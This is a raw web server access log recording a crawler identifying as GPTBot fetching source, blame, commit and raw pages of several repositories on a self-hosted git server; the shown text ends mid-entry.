"/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 13923] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14193] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" [Client 74.7.227.38] [Length 9870] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project" -[17/Feb/2026:13:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/.vscode" [Client 74.7.227.38] [Length 10144] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" [Client 74.7.227.38] [Length 10143] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:13:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/.vscode" [Client 74.7.227.38] [Length 10140] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/.vscode" [Client 74.7.227.38] [Length 10140] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:13:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20377] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:13:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23896] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" -[17/Feb/2026:13:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23926] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:13:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23926] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:13:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" [Client 74.7.227.38] [Length 10547] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:13:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14297] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" -[17/Feb/2026:13:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" -[17/Feb/2026:13:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" [Client 74.7.227.38] [Length 10723] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" -[17/Feb/2026:13:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/.vscode" -[17/Feb/2026:13:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" [Client 74.7.227.38] [Length 10920] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:13:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Footer.tsx" -[17/Feb/2026:13:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/Project%20Planning-1.md" -[17/Feb/2026:13:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" -[17/Feb/2026:13:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71397] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" -[17/Feb/2026:13:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" -[17/Feb/2026:13:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" -[17/Feb/2026:13:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71400] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" -[17/Feb/2026:13:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71366] [Gzip 21.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" -[17/Feb/2026:13:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" -[17/Feb/2026:13:18:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 13891] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15544] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" [Client 74.7.227.38] [Length 13781] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/About.tsx" -[17/Feb/2026:13:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15511] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:18:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16434] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16466] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" [Client 74.7.227.38] [Length 10967] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/README.md" -[17/Feb/2026:13:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14159] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 14776] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components" -[17/Feb/2026:13:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 14809] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" -[17/Feb/2026:13:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/monthly" [Client 74.7.227.38] [Length 8582] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" [Client 74.7.227.38] [Length 13752] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/About.tsx" -[17/Feb/2026:13:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" -[17/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" -[17/Feb/2026:13:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9846] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" -[17/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9845] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" -[17/Feb/2026:13:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" -[17/Feb/2026:13:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16911] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Contact.tsx" -[17/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" -[17/Feb/2026:13:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" -[17/Feb/2026:13:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" -[17/Feb/2026:13:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 14927] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" -[17/Feb/2026:13:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14265] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Footer.tsx" -[17/Feb/2026:13:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15869] [Gzip 7.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" -[17/Feb/2026:13:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16878] [Gzip 8.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" -[17/Feb/2026:13:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" [Client 74.7.227.38] [Length 14961] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Header.tsx" -[17/Feb/2026:13:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/ChatBot.tsx" -[17/Feb/2026:13:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/ChatBot.tsx" -[17/Feb/2026:13:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Contact.tsx" -[17/Feb/2026:13:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] 